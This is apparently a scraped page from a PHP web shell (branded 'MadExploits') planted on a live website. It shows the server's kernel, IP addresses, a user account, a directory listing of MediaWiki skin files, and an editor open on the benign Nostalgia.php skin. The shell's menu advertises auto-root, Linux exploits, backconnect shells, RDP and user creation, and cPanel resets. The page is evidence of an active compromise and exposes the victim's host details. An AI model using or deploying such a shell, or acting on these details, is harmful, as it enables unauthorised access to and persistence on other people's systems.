Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
discover /
skins /
[ HOME SHELL ]
Name
Size
Permission
Action
chick
[ DIR ]
drwxr-xr-x
cologneblue
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
modern
[ DIR ]
drwxr-xr-x
monobook
[ DIR ]
drwxr-xr-x
myskin
[ DIR ]
drwxr-xr-x
nostalgia
[ DIR ]
drwxr-xr-x
simple
[ DIR ]
drwxr-xr-x
vector
[ DIR ]
drwxr-xr-x
Chick.deps.php
503
B
-rw-r--r--
Chick.php
818
B
-rw-r--r--
CologneBlue.php
10.46
KB
-rw-r--r--
Modern.deps.php
452
B
-rw-r--r--
Modern.php
4.07
KB
-rw-r--r--
MonoBook.deps.php
453
B
-rw-r--r--
MonoBook.php
8.37
KB
-rw-r--r--
MySkin.deps.php
504
B
-rw-r--r--
MySkin.php
434
B
-rw-r--r--
Nostalgia.php
3.07
KB
-rw-r--r--
Simple.deps.php
504
B
-rw-r--r--
Simple.php
1.27
KB
-rw-r--r--
Standard.php
8.12
KB
-rw-r--r--
Vector.deps.php
452
B
-rw-r--r--
Vector.php
14.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Nostalgia.php
<?php /** * Nostalgia: A skin which looks like Wikipedia did in its first year (2001). * * @file * @ingroup Skins */ if( !defined( 'MEDIAWIKI' ) ) { die( -1 ); } /** * @todo document * @ingroup Skins */ class SkinNostalgia extends SkinLegacy { var $skinname = 'nostalgia', $stylename = 'nostalgia', $template = 'NostalgiaTemplate'; /** * @param $out OutputPage */ function setupSkinUserCss( OutputPage $out ){ parent::setupSkinUserCss( $out ); $out->addModuleStyles( 'skins.nostalgia' ); } } class NostalgiaTemplate extends LegacyTemplate { /** * @return string */ function doBeforeContent() { $s = "\n<div id='content'>\n<div id='top'>\n"; $s .= '<div id="logo">' . $this->getSkin()->logoText( 'right' ) . '</div>'; $s .= $this->pageTitle(); $s .= $this->pageSubtitle() . "\n"; $s .= '<div id="topbar">'; $s .= $this->topLinks() . "\n<br />"; $notice = $this->getSkin()->getSiteNotice(); if( $notice ) { $s .= "\n<div id='siteNotice'>$notice</div>\n"; } $s .= $this->pageTitleLinks(); $ol = $this->otherLanguages(); if( $ol ) { $s .= '<br />' . $ol; } $s .= $this->getSkin()->getCategories(); $s .= "<br clear='all' /></div><hr />\n</div>\n"; $s .= "\n<div id='article'>"; return $s; } /** * @return string */ function topLinks() { $sep = " |\n"; $s = $this->getSkin()->mainPageLink() . $sep . Linker::specialLink( 'Recentchanges' ); if ( $this->data['isarticle'] ) { $s .= $sep . '<strong>' . $this->editThisPage() . '</strong>' . $sep . $this->talkLink() . $sep . $this->historyLink(); } /* show links to different language variants */ $s .= $this->variantLinks(); $s .= $this->extensionTabLinks(); if ( !$this->data['loggedin'] ) { $s .= $sep . Linker::specialLink( 'Userlogin' ); } else { /* show user page and user talk links */ $user = $this->getSkin()->getUser(); $s .= $sep . Linker::link( $user->getUserPage(), wfMsgHtml( 'mypage' ) ); $s .= $sep . Linker::link( $user->getTalkPage(), wfMsgHtml( 'mytalk' ) ); if ( $user->getNewtalk() ) { $s .= ' *'; } /* show watchlist link */ $s .= $sep . Linker::specialLink( 'Watchlist' ); /* show my contributions link */ $s .= $sep . Linker::link( SpecialPage::getSafeTitleFor( 'Contributions', $this->data['username'] ), wfMsgHtml( 'mycontris' ) ); /* show my preferences link */ $s .= $sep . Linker::specialLink( 'Preferences' ); /* show upload file link */ if( UploadBase::isEnabled() && UploadBase::isAllowed( $user ) === true ) { $s .= $sep . $this->getUploadLink(); } /* show log out link */ $s .= $sep . Linker::specialLink( 'Userlogout' ); } $s .= $sep . $this->specialPagesList(); return $s; } /** * @return string */ function doAfterContent() { $s = "\n</div><br clear='all' />\n"; $s .= "\n<div id='footer'><hr />"; $s .= $this->bottomLinks(); $s .= "\n<br />" . $this->pageStats(); $s .= "\n<br />" . $this->getSkin()->mainPageLink() . ' | ' . $this->getSkin()->aboutLink() . ' | ' . $this->searchForm(); $s .= "\n</div>\n</div>\n"; return $s; } }
Close